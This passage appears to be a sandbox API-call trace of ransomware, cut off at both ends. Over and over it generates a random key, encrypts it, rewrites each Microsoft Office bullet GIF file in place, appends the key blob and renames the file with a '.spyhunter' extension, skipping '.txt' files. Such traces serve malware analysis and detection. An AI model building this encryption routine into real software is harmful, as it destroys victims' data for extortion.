"c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14868_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14868_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14868_.gif.spyhunter")) returned 1 [0100.952] GetProcessHeap () returned 0x2c0000 [0100.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0100.952] GetProcessHeap () returned 0x2c0000 [0100.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0100.953] GetProcessHeap () returned 0x2c0000 [0100.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x337f20 | out: hHeap=0x2c0000) returned 1 [0100.953] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc50 | out: pbBuffer=0x248fc50) returned 1 [0100.953] GetProcessHeap () returned 0x2c0000 [0100.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.953] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc48*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc48*=0x30) returned 1 [0100.953] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14867_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14867_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0100.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14867_.GIF") returned 73 [0100.953] StrStrW (lpFirst="BD14867_.GIF", lpSrch=".txt") returned 0x0 [0100.953] GetProcessHeap () returned 0x2c0000 [0100.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.953] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc0c*=0xfd, lpOverlapped=0x0) returned 1 [0100.954] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff03, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.955] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xfd, lpNumberOfBytesWritten=0x248fc0c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc0c*=0xfd, lpOverlapped=0x0) returned 1 [0100.955] GetProcessHeap () returned 0x2c0000 [0100.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.955] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.955] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc0c, lpOverlapped=0x0 | out: lpBuffer=0x248fc4c*, lpNumberOfBytesWritten=0x248fc0c*=0x4, lpOverlapped=0x0) returned 1 [0100.955] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc0c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc0c*=0x30, lpOverlapped=0x0) returned 1 [0100.955] CloseHandle (hObject=0xb4) returned 1 [0100.955] GetProcessHeap () returned 0x2c0000 [0100.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0100.955] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14867_.GIF.spyhunter") returned 83 [0100.955] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14867_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14867_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14867_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14867_.gif.spyhunter")) returned 1 [0100.956] GetProcessHeap () returned 0x2c0000 [0100.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0100.956] GetProcessHeap () returned 0x2c0000 [0100.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0100.956] GetProcessHeap () returned 0x2c0000 [0100.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8390 | out: hHeap=0x2c0000) returned 1 [0100.956] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc48 | out: pbBuffer=0x248fc48) returned 1 [0100.956] GetProcessHeap () returned 0x2c0000 [0100.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.968] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc40*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc40*=0x30) returned 1 [0100.969] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14866_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14866_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0100.969] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14866_.GIF") returned 73 [0100.969] StrStrW (lpFirst="BD14866_.GIF", lpSrch=".txt") returned 0x0 [0100.969] GetProcessHeap () returned 0x2c0000 [0100.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.969] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc04*=0x1f5, lpOverlapped=0x0) returned 1 [0100.970] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe0b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.970] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1f5, lpNumberOfBytesWritten=0x248fc04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc04*=0x1f5, lpOverlapped=0x0) returned 1 [0100.970] GetProcessHeap () returned 0x2c0000 [0100.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.971] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.971] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc04, lpOverlapped=0x0 | out: lpBuffer=0x248fc44*, lpNumberOfBytesWritten=0x248fc04*=0x4, lpOverlapped=0x0) returned 1 [0100.971] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc04, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc04*=0x30, lpOverlapped=0x0) returned 1 [0100.971] CloseHandle (hObject=0xb4) returned 1 [0100.971] GetProcessHeap () returned 0x2c0000 [0100.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0100.971] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14866_.GIF.spyhunter") returned 83 [0100.971] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14866_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14866_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14866_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14866_.gif.spyhunter")) returned 1 [0100.972] GetProcessHeap () returned 0x2c0000 [0100.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0100.972] GetProcessHeap () returned 0x2c0000 [0100.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0100.972] GetProcessHeap () returned 0x2c0000 [0100.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8470 | out: hHeap=0x2c0000) returned 1 [0100.972] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc48 | out: pbBuffer=0x248fc48) returned 1 [0100.972] GetProcessHeap () returned 0x2c0000 [0100.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0100.972] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc40*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc40*=0x30) returned 1 [0100.972] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14833_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14833_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.023] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14833_.GIF") returned 73 [0101.023] StrStrW (lpFirst="BD14833_.GIF", lpSrch=".txt") returned 0x0 [0101.023] GetProcessHeap () returned 0x2c0000 [0101.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.024] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fc04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fc04*=0xb2, lpOverlapped=0x0) returned 1 [0101.024] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.024] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb2, lpNumberOfBytesWritten=0x248fc04, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fc04*=0xb2, lpOverlapped=0x0) returned 1 [0101.025] GetProcessHeap () returned 0x2c0000 [0101.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.025] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.025] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fc04, lpOverlapped=0x0 | out: lpBuffer=0x248fc44*, lpNumberOfBytesWritten=0x248fc04*=0x4, lpOverlapped=0x0) returned 1 [0101.025] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fc04, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fc04*=0x30, lpOverlapped=0x0) returned 1 [0101.025] CloseHandle (hObject=0xb4) returned 1 [0101.025] GetProcessHeap () returned 0x2c0000 [0101.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0101.025] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14833_.GIF.spyhunter") returned 83 [0101.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14833_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14833_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14833_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14833_.gif.spyhunter")) returned 1 [0101.026] GetProcessHeap () returned 0x2c0000 [0101.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0101.026] GetProcessHeap () returned 0x2c0000 [0101.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.026] GetProcessHeap () returned 0x2c0000 [0101.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b0808 | out: hHeap=0x2c0000) returned 1 [0101.027] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc40 | out: pbBuffer=0x248fc40) returned 1 [0101.027] GetProcessHeap () returned 0x2c0000 [0101.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.027] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc38*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc38*=0x30) returned 1 [0101.027] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21295_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21295_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.028] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21295_.GIF") returned 73 [0101.028] StrStrW (lpFirst="BD21295_.GIF", lpSrch=".txt") returned 0x0 [0101.028] GetProcessHeap () returned 0x2c0000 [0101.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.028] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbfc*=0x96, lpOverlapped=0x0) returned 1 [0101.029] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff6a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.029] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x96, lpNumberOfBytesWritten=0x248fbfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbfc*=0x96, lpOverlapped=0x0) returned 1 [0101.029] GetProcessHeap () returned 0x2c0000 [0101.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.029] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.029] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbfc, lpOverlapped=0x0 | out: lpBuffer=0x248fc3c*, lpNumberOfBytesWritten=0x248fbfc*=0x4, lpOverlapped=0x0) returned 1 [0101.029] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbfc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbfc*=0x30, lpOverlapped=0x0) returned 1 [0101.030] CloseHandle (hObject=0xb4) returned 1 [0101.030] GetProcessHeap () returned 0x2c0000 [0101.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0101.030] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21295_.GIF.spyhunter") returned 83 [0101.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21295_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21295_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21295_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21295_.gif.spyhunter")) returned 1 [0101.031] GetProcessHeap () returned 0x2c0000 [0101.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0101.031] GetProcessHeap () returned 0x2c0000 [0101.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.031] GetProcessHeap () returned 0x2c0000 [0101.031] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x339a40 | out: hHeap=0x2c0000) returned 1 [0101.031] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc40 | out: pbBuffer=0x248fc40) returned 1 [0101.031] GetProcessHeap () returned 0x2c0000 [0101.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.031] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc38*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc38*=0x30) returned 1 [0101.031] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21294_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21294_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.032] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21294_.GIF") returned 73 [0101.032] StrStrW (lpFirst="BD21294_.GIF", lpSrch=".txt") returned 0x0 [0101.032] GetProcessHeap () returned 0x2c0000 [0101.032] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.032] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbfc*=0x7a, lpOverlapped=0x0) returned 1 [0101.033] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff86, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.033] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x7a, lpNumberOfBytesWritten=0x248fbfc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbfc*=0x7a, lpOverlapped=0x0) returned 1 [0101.033] GetProcessHeap () returned 0x2c0000 [0101.033] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.033] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.033] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbfc, lpOverlapped=0x0 | out: lpBuffer=0x248fc3c*, lpNumberOfBytesWritten=0x248fbfc*=0x4, lpOverlapped=0x0) returned 1 [0101.033] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbfc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbfc*=0x30, lpOverlapped=0x0) returned 1 [0101.033] CloseHandle (hObject=0xb4) returned 1 [0101.034] GetProcessHeap () returned 0x2c0000 [0101.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0101.034] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21294_.GIF.spyhunter") returned 83 [0101.034] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21294_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21294_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21294_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21294_.gif.spyhunter")) returned 1 [0101.035] GetProcessHeap () returned 0x2c0000 [0101.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0101.035] GetProcessHeap () returned 0x2c0000 [0101.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.035] GetProcessHeap () returned 0x2c0000 [0101.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x339960 | out: hHeap=0x2c0000) returned 1 [0101.035] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc38 | out: pbBuffer=0x248fc38) returned 1 [0101.035] GetProcessHeap () returned 0x2c0000 [0101.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.035] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc30*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc30*=0x30) returned 1 [0101.035] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15277_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15277_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0101.037] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15277_.GIF") returned 73 [0101.037] StrStrW (lpFirst="BD15277_.GIF", lpSrch=".txt") returned 0x0 [0101.037] GetProcessHeap () returned 0x2c0000 [0101.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.037] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fbf4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fbf4*=0x3c, lpOverlapped=0x0) returned 1 [0101.038] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffffc4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.038] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x248fbf4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fbf4*=0x3c, lpOverlapped=0x0) returned 1 [0101.038] GetProcessHeap () returned 0x2c0000 [0101.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.038] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.038] WriteFile (in: hFile=0xb4, lpBuffer=0x248fc34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fbf4, lpOverlapped=0x0 | out: lpBuffer=0x248fc34*, lpNumberOfBytesWritten=0x248fbf4*=0x4, lpOverlapped=0x0) returned 1 [0101.038] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fbf4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fbf4*=0x30, lpOverlapped=0x0) returned 1 [0101.039] CloseHandle (hObject=0xb4) returned 1 [0101.039] GetProcessHeap () returned 0x2c0000 [0101.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0101.039] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15277_.GIF.spyhunter") returned 83 [0101.039] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15277_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15277_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15277_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15277_.gif.spyhunter")) returned 1 [0101.039] GetProcessHeap () returned 0x2c0000 [0101.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0101.040] GetProcessHeap () returned 0x2c0000 [0101.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0101.040] GetProcessHeap () returned 0x2c0000 [0101.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x339880 | out: hHeap=0x2c0000) returned 1 [0101.040] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fc38 | out: pbBuffer=0x248fc38) returned 1 [0101.040] GetProcessHeap () returned 0x2c0000 [0101.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0101.040] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fc30*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fc30*=0x30) returned 1 [0101.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft 